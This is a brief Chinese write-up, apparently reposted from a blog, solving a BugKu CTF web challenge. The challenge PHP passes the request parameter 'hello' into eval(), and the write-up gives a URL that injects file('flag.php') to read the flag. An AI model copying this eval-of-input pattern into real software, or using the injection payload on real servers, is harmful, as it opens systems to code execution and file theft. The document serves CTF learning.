BugKuCTF WEB 本地包含
生活随笔
收集整理的這篇文章主要介紹了
BugKuCTF WEB 本地包含
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
http://123.206.87.240:8003/
題解:
<?php include "flag.php"; $a = @$_REQUEST['hello']; eval( "var_dump($a);"); show_source(__FILE__); ?>原理:
$_REQUEST[]支持det、post兩種方式發送過來的請求?
var_dump()函數 顯示關于一個或多個表達式的結構信息,包括表達式的類型與值;數組將遞歸展開值,通過縮進顯示其結構
eval()函數把字符串按照 PHP 代碼來計算。該字符串必須是合法的 PHP 代碼,且必須以分號結尾。
show_source() 函數對文件進行語法高亮顯示,是 highlight_file() 的別名?
URL
http://123.206.87.240:8003/?hello=file("flag.php")?
總結
以上是生活随笔為你收集整理的BugKuCTF WEB 本地包含的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: BugKuCTF WEB 你必须让他停下
- 下一篇: BugKuCTF WEB 变量1